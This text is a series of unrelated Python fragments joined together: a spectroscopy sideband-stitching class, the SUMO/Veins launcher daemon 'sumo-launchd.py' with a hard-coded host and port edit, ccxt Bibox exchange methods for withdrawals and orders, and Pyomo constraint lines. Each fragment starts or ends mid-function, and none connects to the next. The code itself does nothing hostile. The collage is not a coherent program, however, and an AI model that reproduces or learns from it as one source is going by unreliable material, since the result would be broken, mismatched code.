:type initial_CCD_piece: HighSidebandCCD
:return: None
"""
self.fname = initial_CCD_piece.fname
try:
self.sb_results = initial_CCD_piece.sb_results
except AttributeError:
print(initial_CCD_piece.full_dict)
raise
self.parameters = initial_CCD_piece.parameters
self.parameters['files_here'] = [initial_CCD_piece.fname.split('/')[-1]]
self.full_dict = {}
for sb in self.sb_results:
self.full_dict[sb[0]] = np.asarray(sb[1:])
@staticmethod
def parse_sb_array(arr):
"""
Check to make sure the first even order sideband in an array is not weaker
than the second even order. If this happens, it's likely because the SB was in
the short pass filter and isn't work counting.
We cut it out to prevent it from itnerfering with calculating overlaps
:param arr:
:return:
"""
arr = np.array(arr)
if (arr[0, sbarr.SBNUM]>0 and arr[1, sbarr.SBNUM]>0 and # make sure they're both pos
arr[0, sbarr.AREA] < arr[1, sbarr.AREA]): # and the fact the area is less
# print "REMOVING FIRST SIDEBAND FROM FULLSIDEBAND"
# print arr[0]
# print arr[1]
arr = arr[1:]
full_dict = {}
for sb in arr:
full_dict[sb[0]] = np.asarray(sb[1:])
return full_dict, arr
def add_CCD(self, ccd_object, verbose=False, force_calc=None, **kwargs):
"""
This method will be called by the stitch_hsg_results function to add another
CCD image to the spectrum.
:param ccd_object: The CCD object that will be stiched into the current FullHighSideband object
:type ccd_object: HighSidebandCCD
:return: None
"""
if self.parameters["gain"] == ccd_object.parameters["gain"]:
calc = False
else:
calc = True
if force_calc is not None:
calc = force_calc
if "need_ratio" in kwargs: #cascading it through, starting to think
# everything should be in a kwarg
calc = kwargs.pop("need_ratio")
try:
# self.full_dict = stitch_hsg_dicts(self.full_dict, ccd_object.full_dict,
# need_ratio=calc, verbose=verbose)
self.full_dict = stitch_hsg_dicts(self, ccd_object, need_ratio=calc,
verbose=verbose, **kwargs)
self.parameters['files_here'].append(ccd_object.fname.split('/')[-1])
# update sb_results, too
sb_results = [[k]+list(v) for k, v in list(self.full_dict.items())]
sb_results = np.array(sb_results)
self.sb_results = sb_results[sb_results[:,0].argsort()]
except AttributeError:
print('Error, not enough sidebands to fit here! {}, {}, {}, {}'.format(
self.parameters["series"], self.parameters["spec_step"],
ccd_object.parameters["series"], ccd_object.parameters["spec_step"]
))
def add_PMT(self, pmt_object, verbose=False):
"""
This method will be called by the stitch_hsg_results function to add the PMT
data to the spectrum.
"""
# print "I'm adding PMT once"
# self.full_dict = stitch_hsg_dicts(pmt_object.full_dict, self.full_dict,
# need_ratio=True, verbose=False)
self.full_dict = stitch_hsg_dicts(pmt_object, self,
need_ratio=True, verbose=verbose)
# if verbose:
# self.full_dict, ratio = self.full_dict
# print "I'm done adding PMT data"
self.parameters['files_here'].append(pmt_object.parameters['files included'])
self.make_results_array()
# if verbose:
# return ratio
def make_results_array(self):
"""
The idea behind this method is to create the sb_results array from the
finished full_dict dictionary.
"""
self.sb_results = None
# print "I'm making the results array:", sorted(self.full_dict.keys())
for sb in sorted(self.full_dict.keys()):
# print "Going to add this", sb
try:
self.sb_results = np.vstack((self.sb_results, np.hstack((sb, self.full_dict[sb]))))
except ValueError:
# print "It didn't exist yet!"
self.sb_results = np.hstack((sb, self.full_dict[sb]))
# print "and I made this array:", self.sb_results[:, 0]
def save_processing(self, file_name, folder_str, marker='', index='', verbose=''):
"""
This will save all of the self.proc_data and the results from the
fitting of this individual file.
Format:
fit_fname = file_name + '_' + marker + '_' + str(index) + '_full.txt'
Inputs:
file_name = the beginning of the file name to be saved
folder_str = the location of the folder where the file will be saved,
will create the folder, if necessary.
marker = I...I don't know what this was originally for
index = used to keep these files from overwriting themselves when in a
list
Outputs:
Two files, one that is self.proc_data, the other is self.sb_results
"""
try:
os.mkdir(folder_str)
except OSError as e:
if e.errno == errno.EEXIST:
pass
else:
| |
<gh_stars>0
#!/usr/bin/env python2
#
# sumo-launchd.py -- SUMO launcher daemon for use with TraCI clients
# Copyright (C) 2006-2012 <NAME> <<EMAIL>>
#
# Documentation for these modules is at http://veins.car2x.org/
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
"""
For each incoming TCP connection the daemon receives a launch configuration.
It starts SUMO accordingly, then proxies all TraCI Messages.
The launch configuration must be sent in the very first TraCI message.
This message must contain a single command, CMD_FILE_SEND and be used to
send a file named "sumo-launchd.launch.xml", which has the following
structure:
<?xml version="1.0"?>
<launch>
<basedir path="/home/sommer/src/inet/examples/erlangen6" />
<seed value="1234" />
<copy file="net.net.xml" />
<copy file="routes.rou.xml" />
<copy file="sumo.sumo.cfg" type="config" />
</launch>
"""
import os
import sys
import tempfile
import shutil
import socket
import struct
import subprocess
import time
import signal
import exceptions
import thread
import xml.dom.minidom
import select
import logging
import atexit
from optparse import OptionParser
_API_VERSION = 1
_LAUNCHD_VERSION = 'sumo-launchd.py 1.00'
_CMD_GET_VERSION = 0x00
_CMD_FILE_SEND = 0x75
_SUMO_HOST = '127.0.0.1'
_SUMO_PORT = 10002
class UnusedPortLock:
lock = thread.allocate_lock()
def __init__(self):
self.acquired = False
def __enter__(self):
self.acquire()
def __exit__(self):
self.release()
def acquire(self):
if not self.acquired:
logging.debug("Claiming lock on port")
UnusedPortLock.lock.acquire()
self.acquired = True
def release(self):
if self.acquired:
logging.debug("Releasing lock on port")
UnusedPortLock.lock.release()
self.acquired = False
def find_unused_port():
"""
Return an unused port number.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.bind(('127.0.0.1', 0))
sock.listen(socket.SOMAXCONN)
ipaddr, port = sock.getsockname()
sock.close()
return port
def forward_connection(client_socket, server_socket, process):
"""
Proxy connections until either socket runs out of data or process terminates.
"""
logging.debug("Starting proxy mode")
client_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
server_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
do_exit = False
while not do_exit:
(r, w, e) = select.select([client_socket, server_socket], [], [client_socket, server_socket], 1)
if client_socket in e:
do_exit = True
if server_socket in e:
do_exit = True
if client_socket in r:
try:
data = client_socket.recv(65535)
if data == "":
do_exit = True
except:
do_exit = True
finally:
server_socket.send(data)
if server_socket in r:
try:
data = server_socket.recv(65535)
if data == "":
do_exit = True
except:
do_exit = True
finally:
client_socket.send(data)
logging.debug("Done with proxy mode")
def parse_launch_configuration(launch_xml_string):
"""
Returns tuple of options set in launch configuration
"""
p = xml.dom.minidom.parseString(launch_xml_string)
# get root node "launch"
launch_node = p.documentElement
if (launch_node.tagName != "launch"):
raise RuntimeError("launch config root element not <launch>, but <%s>" % launch_node.tagName)
# get "launch.basedir"
basedir = ""
basedir_nodes = [x for x in launch_node.getElementsByTagName("basedir") if x.parentNode==launch_node]
if len(basedir_nodes) > 1:
raise RuntimeError('launch config contains %d <basedir> nodes, expected at most 1' % (len(basedir_nodes)))
elif len(basedir_nodes) == 1:
basedir = basedir_nodes[0].getAttribute("path")
logging.debug("Base dir is %s" % basedir)
# get "launch.seed"
seed = 23423
seed_nodes = [x for x in launch_node.getElementsByTagName("seed") if x.parentNode==launch_node]
if len(seed_nodes) > 1:
raise RuntimeError('launch config contains %d <seed> nodes, expected at most 1' % (len(seed_nodes)))
elif len(seed_nodes) == 1:
seed = int(seed_nodes[0].getAttribute("value"))
logging.debug("Seed is %d" % seed)
# get list of "launch.copy" entries
copy_nodes = [x for x in launch_node.getElementsByTagName("copy") if x.parentNode==launch_node]
return (basedir, copy_nodes, seed)
def run_sumo(runpath, sumo_command, shlex, config_file_name, remote_port, seed, client_socket, unused_port_lock, keep_temp):
"""
Actually run SUMO.
"""
# create log files
sumoLogOut = open(os.path.join(runpath, 'sumo-launchd.out.log'), 'w')
sumoLogErr = open(os.path.join(runpath, 'sumo-launchd.err.log'), 'w')
# start SUMO
sumo_start = int(time.time())
sumo_end = None
sumo_returncode = -1
sumo_status = None
try:
cmd = []
if shlex:
import shlex
cmd = shlex.split(sumo_command.replace('{}', '-c ' + unicode(config_file_name).encode()))
else:
cmd = [sumo_command, "-c", config_file_name]
logging.info("Starting SUMO (%s) on port %d, seed %d" % (" ".join(cmd), remote_port, seed))
sumo = subprocess.Popen(cmd, cwd=runpath, stdin=None, stdout=sumoLogOut, stderr=sumoLogErr)
sumo_socket = None
connected = False
tries = 1
while not connected:
try:
logging.debug("Connecting to SUMO (%s) on port %d (try %d)" % (" ".join(cmd), remote_port, tries))
sumo_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# ----- DEFAULT: default code. -----
# sumo_socket.connect(('127.0.0.1', remote_port))
# ----- START: my code. -----
global _SUMO_PORT
global _SUMO_HOST
sumo_socket.connect((_SUMO_HOST, _SUMO_PORT))
# ----- END: my code. -----
handle_set_order(sumo_socket, 1)
break
except socket.error, e:
logging.debug("Error (%s)" % e)
if tries >= 10:
raise
time.sleep(tries * 0.25)
tries += 1
unused_port_lock.release()
forward_connection(client_socket, sumo_socket, sumo)
client_socket.close()
sumo_socket.close()
logging.debug("Done with proxy mode, killing SUMO")
thread.start_new_thread(subprocess.Popen.wait, (sumo, ))
time.sleep(0.5)
if sumo.returncode == None:
logging.debug("SIGTERM")
os.kill(sumo.pid, signal.SIGTERM)
time.sleep(0.5)
if sumo.returncode == None:
logging.debug("SIGKILL")
os.kill(sumo.pid, signal.SIGKILL)
time.sleep(1)
if sumo.returncode == None:
logging.debug("Warning: SUMO still not dead. Waiting 10 more seconds...")
time.sleep(10)
logging.info("Done running SUMO")
sumo_returncode = sumo.returncode
if sumo_returncode == 0:
sumo_status = "Done."
elif sumo_returncode != None:
sumo_status = "Exited with error code %d" % sumo_returncode
else:
sumo_returncode = -1
sumo_status = "Undef"
except OSError, e:
sumo_status = "Could not start SUMO (%s): %s" % (" ".join(cmd), e)
except exceptions.SystemExit:
sumo_status = "Premature launch script exit"
except exceptions.KeyboardInterrupt:
sumo_status = "Keyboard interrupt."
except socket.error, e:
sumo_status = "Could not connect to SUMO (%s). Might be protected by a personal firewall or crashed before a connection could be established." % e
except:
raise
# statistics
sumo_end = int(time.time())
# close log files
sumoLogOut.close()
sumoLogErr.close()
# read log files
sumoLogOut = open(os.path.join(runpath, 'sumo-launchd.out.log'), 'r')
sumoLogErr = open(os.path.join(runpath, 'sumo-launchd.err.log'), 'r')
sumo_stdout = sumoLogOut.read()
sumo_stderr = sumoLogErr.read()
sumoLogOut.close()
sumoLogErr.close()
# prepare result XML
CDATA_START = '<![CDATA['
CDATA_END = ']]>'
result_xml = '<?xml version="1.0"?>\n'
result_xml += '<status>\n'
result_xml += '\t<%s>%s</%s>\n' % ("exit-code", sumo_returncode, "exit-code")
if sumo_start:
result_xml += '\t<%s>%s</%s>\n' % ("start", sumo_start, "start")
if sumo_end:
result_xml += '\t<%s>%s</%s>\n' % ("end", sumo_end, "end")
if sumo_status:
result_xml += '\t<%s>%s</%s>\n' % ("status", sumo_status, "status")
result_xml += '\t<%s>%s</%s>\n' % ("stdout", CDATA_START + sumo_stdout.replace(CDATA_END, CDATA_END + CDATA_END + CDATA_START) + CDATA_END, "stdout")
result_xml += '\t<%s>%s</%s>\n' % ("stderr", CDATA_START + sumo_stderr.replace(CDATA_END, CDATA_END + CDATA_END + CDATA_START) + CDATA_END, "stderr")
result_xml += '</status>\n'
return result_xml
def set_sumoconfig_option(config_parser, config_xml, section, key, value):
"""
Add or replace named config option (currently ignores given section)
"""
key_nodes = config_xml.getElementsByTagName(key)
if len(key_nodes) > 1:
raise RuntimeError('config file "%s" contains %d <%s> nodes, expected at most 1' % (file_dst_name, key, len(key_nodes)))
elif len(key_nodes) < 1:
key_node = config_parser.createElement(key)
key_node.setAttribute("value", str(value))
config_xml.appendChild(key_node)
else:
key_node = key_nodes[0]
for n in key_node.childNodes:
key_node.removeChild(n)
key_node.setAttribute("value", str(value))
def copy_and_modify_files(basedir, copy_nodes, runpath, remote_port, seed):
"""
Copy (and modify) files, return config file name
"""
config_file_name = None
for copy_node in copy_nodes:
file_src_name = None
file_dst_name = None
file_contents = None
# Read from disk?
if copy_node.hasAttribute("file"):
file_src_name = copy_node.getAttribute("file")
file_src_path = os.path.join(basedir, file_src_name)
# Sanity check
if file_src_name.find("/") != -1:
raise RuntimeError('name of file to copy "%s" contains a "/"' % file_src_name)
if not os.path.exists(file_src_path):
raise RuntimeError('file "%s" does not exist' % file_src_path)
# Read contents
file_handle = open(file_src_path, 'rb')
file_contents = file_handle.read()
file_handle.close()
# By now we need a destination name and contents
if copy_node.hasAttribute("name"):
file_dst_name = copy_node.getAttribute("name")
elif file_src_name:
file_dst_name = file_src_name
else:
raise RuntimeError('<copy> node with no destination name: %s' % copy_node.toxml())
if file_contents == None:
raise RuntimeError('<copy> node with no contents: %s' % copy_node.toxml())
# Is this our config file?
if copy_node.getAttribute("type") == "config":
config_file_name = file_dst_name
config_parser = xml.dom.minidom.parseString(file_contents)
config_xml = config_parser.documentElement
set_sumoconfig_option(config_parser, config_xml, "traci_server", "remote-port", remote_port)
set_sumoconfig_option(config_parser, config_xml, "random_number", "seed", seed)
set_sumoconfig_option(config_parser, config_xml, "random_number", "random", "false")
file_contents = config_xml.toxml()
# Write file into rundir
file_dst_path = os.path.join(runpath, file_dst_name)
file_handle = open(file_dst_path, "wb")
file_handle.write(file_contents)
file_handle.close()
# make sure that we copied a config file
if not config_file_name:
raise RuntimeError('launch config contained no <copy> node with type="config"')
return config_file_name
def handle_launch_configuration(sumo_command, shlex, launch_xml_string, client_socket, keep_temp):
"""
Process launch configuration in launch_xml_string.
"""
# create temporary directory
logging.debug("Creating temporary directory...")
runpath = tempfile.mkdtemp(prefix="sumo-launchd-tmp-")
if not runpath:
raise RuntimeError("Could not create temporary directory")
if not os.path.exists(runpath):
raise RuntimeError('Temporary directory "%s" does not exist, even though it should have | |
'body': self.extend(request, params),
})
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":612867,
# "coin_symbol":"ETH",
# "chain_type":"ETH",
# "to_address":"0xd41de7a88ab5fc59edc6669f54873576be95bff1",
# "tx_id":"0xc60950596227af3f27c3a1b5911ea1c79bae53bdce67274e48a0ce87a5ef2df8",
# "addr_remark":"binance",
# "amount":"2.34550946",
# "fee":"0.00600000",
# "createdAt":1561339330000,
# "memo":"",
# "status":3
# }
# ]
# },
# "cmd":"transfer/transferOutList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
withdrawals = self.safe_value(innerResult, 'items', [])
for i in range(0, len(withdrawals)):
withdrawals[i]['type'] = 'withdrawal'
return self.parse_transactions(withdrawals, currency, since, limit)
def parse_transaction(self, transaction, currency=None):
#
# fetchDeposits
#
# {
# 'id': 1023291,
# 'coin_symbol': 'ETH',
# 'to_address': '0x7263....',
# 'amount': '0.49170000',
# 'confirmCount': '16',
# 'createdAt': 1553123867000,
# 'status': 2
# }
#
# fetchWithdrawals
#
# {
# 'id': 521844,
# 'coin_symbol': 'ETH',
# 'to_address': '0xfd4e....',
# 'addr_remark': '',
# 'amount': '0.39452750',
# 'fee': '0.00600000',
# 'createdAt': 1553226906000,
# 'memo': '',
# 'status': 3
# }
#
# withdraw
#
# {
# "result": 228, # withdrawal id
# "cmd":"transfer/transferOut"
# }
#
id = self.safe_string_2(transaction, 'id', 'result')
address = self.safe_string(transaction, 'to_address')
currencyId = self.safe_string(transaction, 'coin_symbol')
code = self.safe_currency_code(currencyId, currency)
timestamp = self.safe_string(transaction, 'createdAt')
tag = self.safe_string(transaction, 'addr_remark')
type = self.safe_string(transaction, 'type')
status = self.parse_transaction_status_by_type(self.safe_string(transaction, 'status'), type)
amount = self.safe_number(transaction, 'amount')
feeCost = self.safe_number(transaction, 'fee')
if type == 'deposit':
feeCost = 0
tag = None
fee = {
'cost': feeCost,
'currency': code,
}
return {
'info': transaction,
'id': id,
'txid': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'network': None,
'address': address,
'addressTo': None,
'addressFrom': None,
'tag': tag,
'tagTo': None,
'tagFrom': None,
'type': type,
'amount': amount,
'currency': code,
'status': status,
'updated': None,
'fee': fee,
}
def parse_transaction_status_by_type(self, status, type=None):
statuses = {
'deposit': {
'1': 'pending',
'2': 'ok',
},
'withdrawal': {
'0': 'pending',
'3': 'ok',
},
}
return self.safe_string(self.safe_value(statuses, type, {}), status, status)
def create_order(self, symbol, type, side, amount, price=None, params={}):
"""
create a trade order
:param str symbol: unified symbol of the market to create an order in
:param str type: 'market' or 'limit'
:param str side: 'buy' or 'sell'
:param float amount: how much of currency you want to trade in units of base currency
:param float price: the price at which the order is to be fullfilled, in units of the quote currency, ignored in market orders
:param dict params: extra parameters specific to the bibox api endpoint
:returns dict: an `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
self.load_markets()
market = self.market(symbol)
orderType = 2 if (type == 'limit') else 1
orderSide = 1 if (side == 'buy') else 2
request = {
'cmd': 'orderpending/trade',
'body': self.extend({
'pair': market['id'],
'account_type': 0,
'order_type': orderType,
'order_side': orderSide,
'pay_bix': 0,
'amount': amount,
'price': price,
}, params),
}
response = self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result": "100055558128036", # order id
# "index": 12345, # random index, specific one in a batch
# "cmd":"orderpending/trade"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
id = self.safe_value(firstResult, 'result')
return {
'info': response,
'id': id,
}
def cancel_order(self, id, symbol=None, params={}):
request = {
'cmd': 'orderpending/cancelTrade',
'body': self.extend({
'orders_id': id,
}, params),
}
response = self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":"OK", # only indicates if the server received the cancelling request, and the cancelling result can be obtained from the order record
# "index": 12345, # random index, specific one in a batch
# "cmd":"orderpending/cancelTrade"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
return firstResult
def fetch_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'cmd': 'orderpending/order',
'body': self.extend({
'id': str(id),
'account_type': 0, # 0 = spot account
}, params),
}
response = self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":{
# "id":"100055558128036",
# "createdAt": 1512756997000,
# "account_type":0,
# "coin_symbol":"LTC", # Trading Token
# "currency_symbol":"BTC", # Pricing Token
# "order_side":2, # Trading side 1-Buy, 2-Sell
# "order_type":2, # 2-limit order
# "price":"0.00900000", # order price
# "amount":"1.00000000", # order amount
# "money":"0.00900000", # currency amount(price * amount)
# "deal_amount":"0.00000000", # deal amount
# "deal_percent":"0.00%", # deal percentage
# "unexecuted":"0.00000000", # unexecuted amount
# "status":3 # Status, -1-fail, 0,1-to be dealt, 2-dealt partly, 3-dealt totally, 4- cancelled partly, 5-cancelled totally, 6-to be cancelled
# },
# "cmd":"orderpending/order"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
order = self.safe_value(firstResult, 'result')
if self.is_empty(order):
raise OrderNotFound(self.id + ' order ' + id + ' not found')
return self.parse_order(order)
def parse_order(self, order, market=None):
marketId = None
baseId = self.safe_string(order, 'coin_symbol')
quoteId = self.safe_string(order, 'currency_symbol')
if (baseId is not None) and (quoteId is not None):
marketId = baseId + '_' + quoteId
market = self.safe_market(marketId, market)
rawType = self.safe_string(order, 'order_type')
type = 'market' if (rawType == '1') else 'limit'
timestamp = self.safe_integer(order, 'createdAt')
price = self.safe_string(order, 'price')
average = self.safe_string(order, 'deal_price')
filled = self.safe_string(order, 'deal_amount')
amount = self.safe_string(order, 'amount')
cost = self.safe_string_2(order, 'deal_money', 'money')
rawSide = self.safe_string(order, 'order_side')
side = 'buy' if (rawSide == '1') else 'sell'
status = self.parse_order_status(self.safe_string(order, 'status'))
id = self.safe_string(order, 'id')
feeCost = self.safe_string(order, 'fee')
fee = None
if feeCost is not None:
fee = {
'cost': feeCost,
'currency': None,
}
return self.safe_order({
'info': order,
'id': id,
'clientOrderId': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': market['symbol'],
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': None,
'amount': amount,
'cost': cost,
'average': average,
'filled': filled,
'remaining': None,
'status': status,
'fee': fee,
'trades': None,
}, market)
def parse_order_status(self, status):
statuses = {
# original comments from bibox:
'1': 'open', # pending
'2': 'open', # part completed
'3': 'closed', # completed
'4': 'canceled', # part canceled
'5': 'canceled', # canceled
'6': 'canceled', # canceling
}
return self.safe_string(statuses, status, status)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
market = None
pair = None
if symbol is not None:
market = self.market(symbol)
pair = market['id']
size = limit if limit else 200
request = {
'cmd': 'orderpending/orderPendingList',
'body': self.extend({
'pair': pair,
'account_type': 0, # 0 - regular, 1 - margin
'page': 1,
'size': size,
}, params),
}
response = self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":"100055558128036",
# "createdAt": 1512756997000,
# "account_type":0,
# "coin_symbol":"LTC", # Trading Token
# "currency_symbol":"BTC", # Pricing Token
# "order_side":2, # Trading side 1-Buy, 2-Sell
# "order_type":2, # 2-limit order
# "price":"0.00900000", # order price
# "amount":"1.00000000", # order amount
# "money":"0.00900000", # currency amount(price * amount)
# "deal_amount":"0.00000000", # deal amount
# "deal_percent":"0.00%", # deal percentage
# "unexecuted":"0.00000000", # unexecuted amount
# "status":1 # Status,-1-fail, 0,1-to be dealt, 2-dealt partly, 3-dealt totally, 4- cancelled partly, 5-cancelled totally, 6-to be cancelled
# }
# ]
# },
# "cmd":"orderpending/orderPendingList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
orders = self.safe_value(innerResult, 'items', [])
return self.parse_orders(orders, market, since, limit)
def fetch_closed_orders(self, symbol=None, since=None, limit=200, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchClosedOrders() requires a `symbol` argument')
self.load_markets()
market = self.market(symbol)
request = {
'cmd': 'orderpending/pendingHistoryList',
'body': self.extend({
'pair': market['id'],
'account_type': 0, # 0 - regular, 1 - margin
'page': 1,
'size': limit,
}, params),
}
response = self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":"100055558128036",
# "createdAt": 1512756997000,
# "account_type":0,
# "coin_symbol":"LTC", # Trading Token
# "currency_symbol":"BTC", # Pricing Token
# "order_side":2, # Trading side 1-Buy, 2-Sell
# "order_type":2, # 2-limit order
# "price":"0.00900000", # order price
# "amount":"1.00000000", # order amount
# "money":"0.00900000", # currency amount(price * amount)
# "deal_amount":"0.00000000", # deal amount
# "deal_percent":"0.00%", # deal percentage
# "unexecuted":"0.00000000", # unexecuted amount
# "status":3 # Status,-1-fail, 0,1-to be dealt, 2-dealt partly, 3-dealt totally, 4- cancelled partly, 5-cancelled | |
- m.x381 - m.x385 - m.x413 - m.x417 + m.x745 == 0)
m.c1127 = Constraint(expr= m.x322 + m.x354 + m.x386 + m.x418 + m.x746 == 100)
m.c1128 = Constraint(expr= m.x323 + m.x355 + m.x387 + m.x419 + m.x747 == 0)
m.c1129 = Constraint(expr= m.x324 + m.x356 + m.x388 + m.x420 + m.x748 == 0)
m.c1130 = Constraint(expr= m.x325 + m.x357 + m.x389 + m.x421 + m.x749 == 0)
m.c1131 = Constraint(expr= m.x326 + m.x358 + m.x390 + m.x422 + m.x750 == 0)
m.c1132 = Constraint(expr= m.x327 + m.x359 + m.x391 + m.x423 + m.x751 == 100)
m.c1133 = Constraint(expr= m.x328 + m.x360 + m.x392 + m.x424 + m.x752 == 0)
m.c1134 = Constraint(expr= m.x329 + m.x361 + m.x393 + m.x425 + m.x753 == 0)
m.c1135 = Constraint(expr= - m.x322 + m.x330 + m.x334 - m.x354 + m.x362 + m.x366 - m.x386 + m.x394 + m.x398 - m.x418
+ m.x426 + m.x430 + m.x754 == 25)
m.c1136 = Constraint(expr= - m.x323 + m.x331 + m.x335 - m.x355 + m.x363 + m.x367 - m.x387 + m.x395 + m.x399 - m.x419
+ m.x427 + m.x431 + m.x755 == 0)
m.c1137 = Constraint(expr= - m.x324 + m.x332 + m.x336 - m.x356 + m.x364 + m.x368 - m.x388 + m.x396 + m.x400 - m.x420
+ m.x428 + m.x432 + m.x756 == 0)
m.c1138 = Constraint(expr= - m.x325 + m.x333 + m.x337 - m.x357 + m.x365 + m.x369 - m.x389 + m.x397 + m.x401 - m.x421
+ m.x429 + m.x433 + m.x757 == 0)
m.c1139 = Constraint(expr= - m.x326 + m.x338 + m.x342 - m.x358 + m.x370 + m.x374 - m.x390 + m.x402 + m.x406 - m.x422
+ m.x434 + m.x438 + m.x758 == 0)
m.c1140 = Constraint(expr= - m.x327 + m.x339 + m.x343 - m.x359 + m.x371 + m.x375 - m.x391 + m.x403 + m.x407 - m.x423
+ m.x435 + m.x439 + m.x759 == 75)
m.c1141 = Constraint(expr= - m.x328 + m.x340 + m.x344 - m.x360 + m.x372 + m.x376 - m.x392 + m.x404 + m.x408 - m.x424
+ m.x436 + m.x440 + m.x760 == 0)
m.c1142 = Constraint(expr= - m.x329 + m.x341 + m.x345 - m.x361 + m.x373 + m.x377 - m.x393 + m.x405 + m.x409 - m.x425
+ m.x437 + m.x441 + m.x761 == 0)
m.c1143 = Constraint(expr= - m.x330 - m.x338 + m.x346 - m.x362 - m.x370 + m.x378 - m.x394 - m.x402 + m.x410 - m.x426
- m.x434 + m.x442 + m.x762 == 0)
m.c1144 = Constraint(expr= - m.x331 - m.x339 + m.x347 - m.x363 - m.x371 + m.x379 - m.x395 - m.x403 + m.x411 - m.x427
- m.x435 + m.x443 + m.x763 == 0)
m.c1145 = Constraint(expr= - m.x332 - m.x340 + m.x348 - m.x364 - m.x372 + m.x380 - m.x396 - m.x404 + m.x412 - m.x428
- m.x436 + m.x444 + m.x764 == 50)
m.c1146 = Constraint(expr= - m.x333 - m.x341 + m.x349 - m.x365 - m.x373 + m.x381 - m.x397 - m.x405 + m.x413 - m.x429
- m.x437 + m.x445 + m.x765 == 0)
m.c1147 = Constraint(expr= - m.x334 - m.x342 + m.x350 - m.x366 - m.x374 + m.x382 - m.x398 - m.x406 + m.x414 - m.x430
- m.x438 + m.x446 + m.x766 == 0)
m.c1148 = Constraint(expr= - m.x335 - m.x343 + m.x351 - m.x367 - m.x375 + m.x383 - m.x399 - m.x407 + m.x415 - m.x431
- m.x439 + m.x447 + m.x767 == 0)
m.c1149 = Constraint(expr= - m.x336 - m.x344 + m.x352 - m.x368 - m.x376 + m.x384 - m.x400 - m.x408 + m.x416 - m.x432
- m.x440 + m.x448 + m.x768 == 0)
m.c1150 = Constraint(expr= - m.x337 - m.x345 + m.x353 - m.x369 - m.x377 + m.x385 - m.x401 - m.x409 + m.x417 - m.x433
- m.x441 + m.x449 + m.x769 == 50)
m.c1151 = Constraint(expr= - m.x346 - m.x350 - m.x378 - m.x382 - m.x410 - m.x414 - m.x442 - m.x446 + m.x770 == 0)
m.c1152 = Constraint(expr= - m.x347 - m.x351 - m.x379 - m.x383 - m.x411 - m.x415 - m.x443 - m.x447 + m.x771 == 0)
m.c1153 = Constraint(expr= - m.x348 - m.x352 - m.x380 - m.x384 - m.x412 - m.x416 - m.x444 - m.x448 + m.x772 == 0)
m.c1154 = Constraint(expr= - m.x349 - m.x353 - m.x381 - m.x385 - m.x413 - m.x417 - m.x445 - m.x449 + m.x773 == 0)
m.c1155 = Constraint(expr= m.x322 + m.x354 + m.x386 + m.x418 + m.x450 + m.x774 == 100)
m.c1156 = Constraint(expr= m.x323 + m.x355 + m.x387 + m.x419 + m.x451 + m.x775 == 0)
m.c1157 = Constraint(expr= m.x324 + m.x356 + m.x388 + m.x420 + m.x452 + m.x776 == 0)
m.c1158 = Constraint(expr= m.x325 + m.x357 + m.x389 + m.x421 + m.x453 + m.x777 == 0)
m.c1159 = Constraint(expr= m.x326 + m.x358 + m.x390 + m.x422 + m.x454 + m.x778 == 0)
m.c1160 = Constraint(expr= m.x327 + m.x359 + m.x391 + m.x423 + m.x455 + m.x779 == 100)
m.c1161 = Constraint(expr= m.x328 + m.x360 + m.x392 + m.x424 + m.x456 + m.x780 == 0)
m.c1162 = Constraint(expr= m.x329 + m.x361 + m.x393 + m.x425 + m.x457 + m.x781 == 0)
m.c1163 = Constraint(expr= - m.x322 + m.x330 + m.x334 - m.x354 + m.x362 + m.x366 - m.x386 + m.x394 + m.x398 - m.x418
+ m.x426 + m.x430 - m.x450 + m.x458 + m.x462 + m.x782 == 25)
m.c1164 = Constraint(expr= - m.x323 + m.x331 + m.x335 - m.x355 + m.x363 + m.x367 - m.x387 + m.x395 + m.x399 - m.x419
+ m.x427 + m.x431 - m.x451 + m.x459 + m.x463 + m.x783 == 0)
m.c1165 = Constraint(expr= - m.x324 + m.x332 + m.x336 - m.x356 + m.x364 + m.x368 - m.x388 + m.x396 + m.x400 - m.x420
+ m.x428 + m.x432 - m.x452 + m.x460 + m.x464 + m.x784 == 0)
